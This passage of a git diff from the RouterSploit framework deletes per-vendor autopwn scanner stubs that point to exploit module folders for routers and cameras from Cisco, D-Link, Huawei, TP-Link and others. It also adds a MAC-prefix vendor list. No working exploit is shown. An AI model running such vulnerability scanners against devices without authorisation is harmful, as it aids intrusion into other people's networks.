- ], - 'references': ( - '', - ), - 'devices': ( - 'BHU uRouter', - ), - } - modules = ['routers/bhu', 'cameras/bhu', 'misc/bhu'] diff --git a/routersploit/modules/scanners/billion_scan.py b/routersploit/modules/scanners/billion_scan.py deleted file mode 100755 index 6bd9319f2..000000000 --- a/routersploit/modules/scanners/billion_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Billion vulnerabilities. - """ - __info__ = { - 'name': 'Billion Scanner', - 'description': 'Scanner module for Billion devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Billion', - ), - } - modules = ['routers/billion', 'cameras/billion', 'misc/billion'] diff --git a/routersploit/modules/scanners/cameras_scan.py b/routersploit/modules/scanners/cameras_scan.py deleted file mode 100755 index 86938e09f..000000000 --- a/routersploit/modules/scanners/cameras_scan.py +++ /dev/null @@ -1,19 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for cameras. - """ - __info__ = { - 'name': 'Cameras Scanner', - 'description': 'Scanner module for cameras', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': (), - 'devices': (), - } - modules = ['cameras'] diff --git a/routersploit/modules/scanners/cisco_scan.py b/routersploit/modules/scanners/cisco_scan.py deleted file mode 100644 index b595bab56..000000000 --- a/routersploit/modules/scanners/cisco_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Cisco vulnerabilities. - """ - __info__ = { - 'name': 'Cisco Scanner', - 'description': 'Scanner module for Cisco devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Cisco', - ), - } - modules = ['routers/cisco', 'cameras/cisco', 'misc/cisco'] diff --git a/routersploit/modules/scanners/comtrend_scan.py b/routersploit/modules/scanners/comtrend_scan.py deleted file mode 100755 index 48ae0e6b7..000000000 --- a/routersploit/modules/scanners/comtrend_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Comtrend vulnerabilities. - """ - __info__ = { - 'name': 'Comtrend Scanner', - 'description': 'Scanner module for Comtrend devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Comtrend', - ), - } - modules = ['routers/comtrend', 'cameras/comtrend', 'misc/comtrend'] diff --git a/routersploit/modules/scanners/dlink_scan.py b/routersploit/modules/scanners/dlink_scan.py deleted file mode 100755 index 69bc0b6de..000000000 --- a/routersploit/modules/scanners/dlink_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Dlink vulnerabilities. - """ - __info__ = { - 'name': 'Dlink Scanner', - 'description': 'Scanner module for Dlink devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Dlink', - ), - } - modules = ['routers/dlink', 'cameras/dlink', 'misc/dlink'] diff --git a/routersploit/modules/scanners/fortinet_scan.py b/routersploit/modules/scanners/fortinet_scan.py deleted file mode 100755 index 63bdc03c4..000000000 --- a/routersploit/modules/scanners/fortinet_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Fortinet vulnerabilities. - """ - __info__ = { - 'name': 'Fortinet Scanner', - 'description': 'Scanner module for Fortinet devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Fortinet', - ), - } - modules = ['routers/fortinet', 'cameras/fortinet', 'misc/fortinet'] diff --git a/routersploit/modules/scanners/grandstream_scan.py b/routersploit/modules/scanners/grandstream_scan.py deleted file mode 100755 index 4da473884..000000000 --- a/routersploit/modules/scanners/grandstream_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Grandstream vulnerabilities. - """ - __info__ = { - 'name': 'Grandstream Scanner', - 'description': 'Scanner module for Grandstream devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Grandstream', - ), - } - modules = ['routers/grandstream', 'cameras/grandstream', 'misc/grandstream'] diff --git a/routersploit/modules/scanners/huawei_scan.py b/routersploit/modules/scanners/huawei_scan.py deleted file mode 100755 index 5eca180a1..000000000 --- a/routersploit/modules/scanners/huawei_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Huawei vulnerabilities. - """ - __info__ = { - 'name': 'Huawei Scanner', - 'description': 'Scanner module for Huawei devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Huawei', - ), - } - modules = ['routers/huawei', 'cameras/huawei', 'misc/huawei'] diff --git a/routersploit/modules/scanners/ipfire_scan.py b/routersploit/modules/scanners/ipfire_scan.py deleted file mode 100755 index 68a33f982..000000000 --- a/routersploit/modules/scanners/ipfire_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Ipfire vulnerabilities. - """ - __info__ = { - 'name': 'Ipfire Scanner', - 'description': 'Scanner module for Ipfire devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Ipfire', - ), - } - modules = ['routers/ipfire', 'cameras/ipfire', 'misc/ipfire'] diff --git a/routersploit/modules/scanners/juniper_scan.py b/routersploit/modules/scanners/juniper_scan.py deleted file mode 100755 index baacabfd2..000000000 --- a/routersploit/modules/scanners/juniper_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Juniper vulnerabilities. - """ - __info__ = { - 'name': 'Juniper Scanner', - 'description': 'Scanner module for Juniper devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Juniper', - ), - } - modules = ['routers/juniper', 'cameras/juniper', 'misc/juniper'] diff --git a/routersploit/modules/scanners/linksys_scan.py b/routersploit/modules/scanners/linksys_scan.py deleted file mode 100755 index 216a2739a..000000000 --- a/routersploit/modules/scanners/linksys_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Linksys vulnerabilities. - """ - __info__ = { - 'name': 'Linksys Scanner', - 'description': 'Scanner module for Linksys devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Linksys', - ), - } - modules = ['routers/linksys', 'cameras/linksys', 'misc/linksys'] diff --git a/routersploit/modules/scanners/misc_scan.py b/routersploit/modules/scanners/misc_scan.py deleted file mode 100755 index 340384d53..000000000 --- a/routersploit/modules/scanners/misc_scan.py +++ /dev/null @@ -1,19 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for misc devices. - """ - __info__ = { - 'name': 'Misc Scanner', - 'description': 'Scanner module for misc devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': (), - 'devices': (), - } - modules = ['misc'] diff --git a/routersploit/modules/scanners/movistar_scan.py b/routersploit/modules/scanners/movistar_scan.py deleted file mode 100755 index 604c41734..000000000 --- a/routersploit/modules/scanners/movistar_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Movistar vulnerabilities. - """ - __info__ = { - 'name': 'Movistar Scanner', - 'description': 'Scanner module for Movistar devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Movistar', - ), - } - modules = ['routers/movistar', 'cameras/movistar', 'misc/movistar'] diff --git a/routersploit/modules/scanners/multi_scan.py b/routersploit/modules/scanners/multi_scan.py deleted file mode 100755 index 3dd49f57b..000000000 --- a/routersploit/modules/scanners/multi_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Multi vulnerabilities. - """ - __info__ = { - 'name': 'Multi Scanner', - 'description': 'Scanner module for Multi devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Multi', - ), - } - modules = ['routers/multi', 'cameras/multi', 'misc/multi'] diff --git a/routersploit/modules/scanners/netcore_scan.py b/routersploit/modules/scanners/netcore_scan.py deleted file mode 100755 index 8abeb7c2c..000000000 --- a/routersploit/modules/scanners/netcore_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Netcore vulnerabilities. - """ - __info__ = { - 'name': 'Netcore Scanner', - 'description': 'Scanner module for Netcore devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Netcore', - ), - } - modules = ['routers/netcore', 'cameras/netcore', 'misc/netcore'] diff --git a/routersploit/modules/scanners/netgear_scan.py b/routersploit/modules/scanners/netgear_scan.py deleted file mode 100644 index 6975584d9..000000000 --- a/routersploit/modules/scanners/netgear_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Netgear vulnerabilities. - """ - __info__ = { - 'name': 'Netgear Scanner', - 'description': 'Scanner module for Netgear devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Netgear', - ), - } - modules = ['routers/netgear', 'cameras/netgear', 'misc/netgear'] diff --git a/routersploit/modules/scanners/netsys_scan.py b/routersploit/modules/scanners/netsys_scan.py deleted file mode 100755 index 2bc37f766..000000000 --- a/routersploit/modules/scanners/netsys_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Netsys vulnerabilities. - """ - __info__ = { - 'name': 'Netsys Scanner', - 'description': 'Scanner module for Netsys devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Netsys', - ), - } - modules = ['routers/netsys', 'cameras/netsys', 'misc/netsys'] diff --git a/routersploit/modules/scanners/routers_scan.py b/routersploit/modules/scanners/routers_scan.py deleted file mode 100755 index 09c44970c..000000000 --- a/routersploit/modules/scanners/routers_scan.py +++ /dev/null @@ -1,19 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for routers. - """ - __info__ = { - 'name': 'Router Scanner', - 'description': 'Scanner module for routers', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': (), - 'devices': (), - } - modules = ['routers'] diff --git a/routersploit/modules/scanners/shuttle_scan.py b/routersploit/modules/scanners/shuttle_scan.py deleted file mode 100755 index 4be91e58c..000000000 --- a/routersploit/modules/scanners/shuttle_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Shuttle vulnerabilities. - """ - __info__ = { - 'name': 'Shuttle Scanner', - 'description': 'Scanner module for Shuttle devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Shuttle', - ), - } - modules = ['routers/shuttle', 'cameras/shuttle', 'misc/shuttle'] diff --git a/routersploit/modules/scanners/technicolor_scan.py b/routersploit/modules/scanners/technicolor_scan.py deleted file mode 100755 index fb6a543ce..000000000 --- a/routersploit/modules/scanners/technicolor_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Technicolor vulnerabilities. - """ - __info__ = { - 'name': 'Technicolor Scanner', - 'description': 'Scanner module for Technicolor devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Technicolor', - ), - } - modules = ['routers/technicolor', 'cameras/technicolor', 'misc/technicolor'] diff --git a/routersploit/modules/scanners/thomson_scan.py b/routersploit/modules/scanners/thomson_scan.py deleted file mode 100755 index d98bccde0..000000000 --- a/routersploit/modules/scanners/thomson_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Thomson vulnerabilities. - """ - __info__ = { - 'name': 'Thomson Scanner', - 'description': 'Scanner module for Thomson devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Thomson', - ), - } - modules = ['routers/thomson', 'cameras/thomson', 'misc/thomson'] diff --git a/routersploit/modules/scanners/tplink_scan.py b/routersploit/modules/scanners/tplink_scan.py deleted file mode 100644 index 7d920bf54..000000000 --- a/routersploit/modules/scanners/tplink_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for TP-Link vulnerabilities. - """ - __info__ = { - 'name': 'TP-Link Scanner', - 'description': 'Scanner module for Netgear devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'TP-Link', - ), - } - modules = ['routers/tplink', 'cameras/tplink', 'misc/tplink'] diff --git a/routersploit/modules/scanners/ubiquiti_scan.py b/routersploit/modules/scanners/ubiquiti_scan.py deleted file mode 100755 index 9f50f5af6..000000000 --- a/routersploit/modules/scanners/ubiquiti_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Ubiquiti vulnerabilities. - """ - __info__ = { - 'name': 'Ubiquiti Scanner', - 'description': 'Scanner module for Ubiquiti devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Ubiquiti', - ), - } - modules = ['routers/ubiquiti', 'cameras/ubiquiti', 'misc/ubiquiti'] diff --git a/routersploit/modules/scanners/zte_scan.py b/routersploit/modules/scanners/zte_scan.py deleted file mode 100755 index c12722d53..000000000 --- a/routersploit/modules/scanners/zte_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Zte vulnerabilities. - """ - __info__ = { - 'name': 'Zte Scanner', - 'description': 'Scanner module for Zte devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Zte', - ), - } - modules = ['routers/zte', 'cameras/zte', 'misc/zte'] diff --git a/routersploit/modules/scanners/zyxel_scan.py b/routersploit/modules/scanners/zyxel_scan.py deleted file mode 100755 index 3cc2ba982..000000000 --- a/routersploit/modules/scanners/zyxel_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Zyxel vulnerabilities. - """ - __info__ = { - 'name': 'Zyxel Scanner', - 'description': 'Scanner module for Zyxel devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Zyxel', - ), - } - modules = ['routers/zyxel', 'cameras/zyxel', 'misc/zyxel'] diff --git a/routersploit/printer.py b/routersploit/printer.py deleted file mode 100644 index bc0ceb9c2..000000000 --- a/routersploit/printer.py +++ /dev/null @@ -1,26 +0,0 @@ -from __future__ import print_function -from __future__ import absolute_import - -import threading -from weakref import WeakKeyDictionary - -try: - import queue -except ImportError: - import Queue as queue - - -printer_queue = queue.Queue() -thread_output_stream = WeakKeyDictionary() - - -class PrinterThread(threading.Thread): - def __init__(self): - super(PrinterThread, self).__init__() - self.daemon = True - - def run(self): - while True: - content, sep, end, file_, thread = printer_queue.get() - print(*content, sep=sep, end=end, file=file_) - printer_queue.task_done() diff --git a/routersploit/resources/vendors/oui.dat b/routersploit/resources/vendors/oui.dat new file mode 100644 index 000000000..ead73fda2 --- /dev/null +++ b/routersploit/resources/vendors/oui.dat @@ -0,0 +1,23798 @@ +E043DB Shenzhen ViewAt Technology +2405F5 Integrated Device Technology (Malaysia) Sdn. Bhd. +3CD92B Hewlett Packard +9C8E99 Hewlett Packard +B499BA Hewlett Packard +1CC1DE Hewlett Packard +3C3556 Cognitec Systems GmbH +0050BA D-Link +00179A D-Link +1CBDB9 D-Link International +9094E4 D-Link International +28107B D-Link International +1C7EE5 D-Link International +C4A81D D-Link International +18622C Sagemcom Broadband SAS +7C03D8 Sagemcom Broadband SAS +E8F1B0 Sagemcom Broadband SAS +00F871 DGS Denmark A/S +20BB76 COL Giovanni Paolo SpA +2C228B CTR SRL +348AAE Sagemcom Broadband SAS +BCEC23 Shenzhen Chuangwei-rgb Electronics +AC06C7 ServerNet S.r.l. +CC46D6 Cisco Systems +48AD08 Huawei Technologies +2CAB00 Huawei Technologies +00E0FC Huawei Technologies +24DF6A Huawei Technologies +009ACD Huawei Technologies +00CDFE Apple +38F23E Microsoft Mobile Oy +58AC78 Cisco Systems +907F61 Chicony Electronics +28BC18 SourcingOverseas +807ABF HTC +409F87 Jide Technology (Hong Kong) Limited +3C5AB4 Google +001A11 Google +D83C69 Shenzhen Tinno Mobile Technology +74AC5F Qiku Internet Network Scientific (Shenzhen) +18AF61 Apple +BC83A7 Shenzhen Chuangwei-rgb Electronics +000347 Intel +001175 Intel +0013E8 Intel Corporate +001302 Intel Corporate +E4F89C Intel Corporate +A402B9 Intel Corporate +4C3488 Intel Corporate +000D0B Buffalo.inc +000740 Buffalo.inc +0024A5 Buffalo.inc +DCFB02 Buffalo.inc +F4CE46 Hewlett Packard +001CC4 Hewlett Packard +0025B3 Hewlett Packard +001871 Hewlett Packard +000BCD Hewlett Packard +000E7F Hewlett Packard +000F20 Hewlett Packard +00110A Hewlett Packard +001321 Hewlett Packard +001635 Hewlett Packard +0017A4 Hewlett Packard +000802 Hewlett Packard +90E7C4 HTC +74A78E zte +D860B0 bioMrieux Italia +8038BC Huawei Technologies +D440F0 Huawei Technologies +64A651 Huawei Technologies +E8CD2D Huawei Technologies +ACE215 Huawei Technologies +EC233D Huawei Technologies +78F5FD Huawei Technologies +80B686 Huawei Technologies +10C61F Huawei Technologies +8853D4 Huawei Technologies +0C37DC Huawei Technologies +BC7670 Huawei Technologies +24DBAC Huawei Technologies +0021E8 Murata Manufacturing +006057 Murata Manufacturing +0007D8 Hitron Technologies. +84742A zte +681AB2 zte +E005C5 TP-Link Technologies +A0F3C1 TP-Link Technologies +8C210A TP-Link Technologies +EC172F TP-Link Technologies +EC888F TP-Link Technologies +14CF92 TP-Link Technologies +645601 TP-Link Technologies +14CC20 TP-Link Technologies +BC4699 TP-Link Technologies +0C45BA Huawei Technologies +847778 Cochlear Limited +0453D5 Sysorex Global Holdings +CC4463 Apple +6C72E7 Apple +CCA223 Huawei Technologies +E8088B Huawei Technologies +60E701 Huawei Technologies +000883 Hewlett Packard +C4346B Hewlett Packard +8CDCD4 Hewlett Packard +3464A9 Hewlett Packard +D4C9EF Hewlett Packard +A45D36 Hewlett Packard +A0D3C1 Hewlett Packard +40A8F0 Hewlett Packard +6C3BE5 Hewlett Packard +082E5F Hewlett Packard +28924A Hewlett Packard +10604B Hewlett Packard +308D99 Hewlett Packard +0030C1 Hewlett Packard +FC3FDB Hewlett Packard +4CA161 Rain Bird +7C6193 HTC +001217 Cisco-Linksys +000C41 Cisco-Linksys +000F66 Cisco-Linksys +44E08E Cisco Spvtg +185933 Cisco Spvtg +E448C7 Cisco Spvtg +24767D Cisco Spvtg +2CABA4 Cisco Spvtg +0002C7 Alps Electric +04766E Alps Electric +006B8E Shanghai Feixun Communication +AC853D Huawei Technologies +74882A Huawei Technologies +78D752 Huawei Technologies +E0247F Huawei Technologies +00464B Huawei Technologies +707BE8 Huawei Technologies +548998 Huawei Technologies +0819A6 Huawei Technologies +3CF808 Huawei Technologies +B41513 Huawei Technologies +283152 Huawei Technologies +DCD2FC Huawei Technologies +0003DD Comark Interactive Solutions +00107B Cisco Systems +00906D Cisco Systems +0090BF Cisco Systems +005080 Cisco Systems +00E018 Asustek Computer +000C6E Asustek Computer +001BFC Asustek Computer +001E8C Asustek Computer +0015F2 Asustek Computer +002354 Asustek Computer +001FC6 Asustek Computer +60182E ShenZhen Protruly Electronic +F4CFE2 Cisco Systems +501CBF Cisco Systems +285FDB Huawei Technologies +404D8E Huawei Technologies +781DBA Huawei Technologies +001E10 Huawei Technologies +88F031 Cisco Systems +508789 Cisco Systems +381C1A Cisco Systems +F40F1B Cisco Systems +BC671C Cisco Systems +A0ECF9 Cisco Systems +D46D50 Cisco Systems +1CE85D Cisco Systems +C47295 Cisco Systems +A0554F Cisco Systems +84B802 Cisco Systems +BCC493 Cisco Systems +001947 Cisco Spvtg +0022CE Cisco Spvtg +F02929 Cisco Systems +ECE1A9 Cisco Systems +7C69F6 Cisco Systems +C08C60 Cisco Systems +C0255C Cisco Systems +885A92 Cisco Systems +E4C722 Cisco Systems +C07BBC Cisco Systems +0090F2 Cisco Systems +00173B Cisco Systems +00400B Cisco Systems +006009 Cisco Systems +006047 Cisco Systems +0006C1 Cisco Systems +00E014 Cisco Systems +00E01E Cisco Systems +ACF2C5 Cisco Systems +CCC760 Apple +087402 Apple +285AEB Apple +28F076 Apple +84285A Saffron Solutions +80A1AB Intellisis +44D884 Apple +EC852F Apple +286ABA Apple +705681 Apple +7CD1C3 Apple +F0DCE2 Apple +B065BD Apple +A82066 Apple +BC6778 Apple +68967B Apple +848506 Apple +B4F0AB Apple +10DDB1 Apple +04F7E4 Apple +34C059 Apple +F0D1A9 Apple +F82793 Apple +ACFDEC Apple +D0E140 Apple +F832E4 Asustek Computer +8C7C92 Apple +7831C1 Apple +F437B7 Apple +54AE27 Apple +6476BA Apple +84B153 Apple +783A84 Apple +2CBE08 Apple +24E314 Apple +0010FF Cisco Systems +34BDC8 Cisco Systems +54A274 Cisco Systems +5897BD Cisco Systems +046C9D Cisco Systems +60FEC5 Apple +00A040 Apple +BC3BAF Apple +786C1C Apple +041552 Apple +38484C Apple +701124 Apple +C86F1D Apple +685B35 Apple +380F4A Apple +3010E4 Apple +04DB56 Apple +881FA1 Apple +04E536 Apple +109ADD Apple +40A6D9 Apple +7CF05F Apple +A4B197 Apple +0C74C2 Apple +403004 Apple +4860BC Apple +50EAD6 Apple +28E02C Apple +60C547 Apple +7C11BE Apple +003EE1 Apple +68D93C Apple +2CF0EE Apple +84788B Apple +6C94F8 Apple +703EAC Apple +C01ADA Apple +34363B Apple +C81EE7 Apple +9CFC01 Apple +000D93 Apple +001CB3 Apple +64B9E8 Apple +34159E Apple +58B035 Apple +F0B479 Apple +141357 ATP Electronics +F44B2A Cisco Spvtg +3C8CF8 Trendnet +78D6B2 Toshiba +C04A09 Zhejiang Everbright Communication Equip. +F00D5C JinQianMao Technology +2C081C OVH +30E090 Linctronix +70BF3E Charles River Laboratories +D848EE Hangzhou Xueji Technology +88C242 Poynt +E8343E Beijing Infosec Technologies +C4ADF1 Gopeace +58F496 Source Chain +80B709 Viptela +1C60DE Shenzhen Mercury Communication Technologies +741865 Shanghai DareGlobal Technologies +0084ED Private +DCDC07 TRP Systems BV +080A4E Planet Bingo 3rd Rock Gaming +0C1A10 Acoustic Stream +E4A387 Control Solutions +DC82F6 iPort +C49E41 G24 Power Limited +D03E5C Huawei Technologies +C8A9FC Goyoo Networks +C49FF3 Mciao Technologies +7C2BE1 Shenzhen Ferex Electrical +30FFF6 HangZhou KuoHeng Technology +5853C0 Beijing Guang Runtong Technology Development Company +5031AD ABB Global Industries and Services Private Limited +30A243 Shenzhen Prifox Innovation Technology +2CA539 Parallel Wireless +FC335F Polyera +A8C87F Roqos +C025A2 NEC Platforms +7853F2 Roxton +ACBC32 Apple +94BBAE Husqvarna AB +AC8995 AzureWave Technology +F898B9 Huawei Technologies +1C497B Gemtek Technology +2CCF58 Huawei Technologies +54FF82 Davit Solution +D445E8 Jiangxi Hongpai Technology +847973 Shanghai Baud Data Communication +906F18 Private +881B99 Shenzhen XIN FEI JIA Electronic +681295 Lupine Lighting Systems GmbH +649A12 P2 Mobile Technologies Limited +E4C2D1 Huawei Technologies +DC3CF6 Atomic Rules +3C3178 Qolsys +083A5C Junilab +4CAE31 ShengHai Electronics (Shenzhen) +F0D657 Echosens +24693E innodisk +E48D8C Routerboard.com +C0DC6A Qingdao Eastsoft Communication Technology +6459F8 Vodafone Omnitel +082CB0 Network Instruments +485073 Microsoft +3CA31A Oilfind International +A424DD Cambrionix +88A2D7 Huawei Technologies +D89A34 Beijing Shenqi Technology +1CADD1 Bosung Electronics +24E5AA Philips Oral Healthcare +88CBA5 Suzhou Torchstar Intelligent Technology +046169 Media Global Links +AC562C Lava International(h.k) Limited +3CCE15 Mercedes-Benz USA +84DF19 Chuango Security Technology +3C4711 Huawei Technologies +245BF0 Liteon +FCFEC2 Invensys Controls UK Limited +E8F2E2 LG Innotek +AC676F Electrocompaniet A.S. +4CB82C Cambridge Mobile Telematics +F0224E Esan electronic +B0411D Ittim Technologies +7CB25C Acacia Communications +78EB39 Instituto Nacional de Tecnologa Industrial +ECEED8 Ztlx Network Technology +F85B9C SB Systems +7CA237 King Slide Technology +300EE3 Aquantia +847303 Letv Mobile and Intelligent Information Technology (Beijing) +B0495F Omron Healthcare +BC6E64 Sony Mobile Communications AB +F44713 Leading Public Performance +D4522A TangoWiFi.com +B0ECE1 Private +407FE0 Glory Star Technics (ShenZhen) Limited +BC5C4C Elecom +6C5940 Shenzhen Mercury Communication Technologies +6CA75F zte +C8C50E Shenzhen Primestone Network Technologies.Co. +9CBEE0 Biosoundlab +5C5B35 Mist Systems +E807BF Shenzhen Boomtech Industry +E8162B Ideo Security +709F2D zte +ECE2FD SKG Electric Group(Thailand) +88E603 Avotek +74E28C Microsoft +94F19E Huizhou Maorong Intelligent Technology +C4924C Keisokuki Center +E4F939 Minxon Hotel Technology +38C70A WiFiSong +60E6BC Sino-Telecom Technology +486EFB Davit System Technology +340A22 Top-access Electronics +B008BF Vital Connect +485415 NET Rules Tecnologia Eireli +70C76F Inno S +704E66 Shenzhen Fast Technologies +409B0D Shenzhen Yourf Kwan Industrial +C40880 Shenzhen Utepo Tech +94C038 Tallac Networks +801967 Shanghai Reallytek Information Technology +6836B5 DriveScale +2CF7F1 Seeed Technology +F88479 Yaojin Technology(Shenzhen)Co. +4C48DA Beijing Autelan Technology +90179B Nanomegas +3077CB Maike Industry(Shenzhen)CO. +3428F0 ATN International Limited +EC3C5A Shen Zhen Heng Sheng HUI Digital Technology +8C0551 Koubachi AG +D88466 Extreme Networks +E887A3 Loxley Public Company Limited +10FACE Reacheng Communication Technology +D8CB8A Micro-star Intl +A8D0E3 Systech Electronics +8463D6 Microsoft +78B3B9 ShangHai sunup lighting +F4EE14 Shenzhen Mercury Communication Technologies +186571 Top Victory Electronics (Taiwan) +F8BC41 Rosslare Enterprises Limited +8486F3 Greenvity Communications +205CFA Yangzhou ChangLian Network Technology +8C18D9 Shenzhen RF Technology +6099D1 Vuzix / Lenovo +34F6D2 Panasonic Taiwan +DC2F03 Step forward Group +582136 KMB systems, s.r.o. +00AEFA Murata Manufacturing +5CAAFD Sonos +8CDF9D NEC +F8E903 D-Link International +6828F6 Vubiq Networks +44356F Neterix +742EFC DirectPacket Research +20C06D Shenzhen Spacetek Technology +3CB792 Hitachi Maxell,, Optronics Division +7491BD Four systems +D43266 Fike +948E89 Industrias Unidas SA DE CV +9405B6 Liling FullRiver Electronics & Technology +382C4A Asustek Computer +74547D Cisco Spvtg +D48F33 Microsoft +1CA2B1 ruwido austria gmbh +945493 Rigado +34B7FD Guangzhou Younghead Electronic Technology +384B76 Airtame ApS +1C5216 Dongguan Hele Electronics +34029B CloudBerry Technologies Private Limited +70AF25 Nishiyama Industry +B47C29 Shenzhen Guzidi Technology +2C1A31 Electronics Company Limited +6C198F D-Link International +60C1CB Fujian Great Power PLC Equipment +686E48 Prophet Electronic Technology +30F7D7 Thread Technology +3808FD Silca Spa +7C2587 chaowifi.com +2012D5 Scientech Materials +DC3979 Skyport Systems +EC1D7F zte +AC11D3 Suzhou Hotek Video Technology +304225 Burg-wchter KG +1C4840 IMS Messsysteme GmbH +F42853 Zioncom Electronics (Shenzhen) +3C46D8 TP-Link Technologies +6C0273 Shenzhen Jin Yun Video Equipment +F0761C 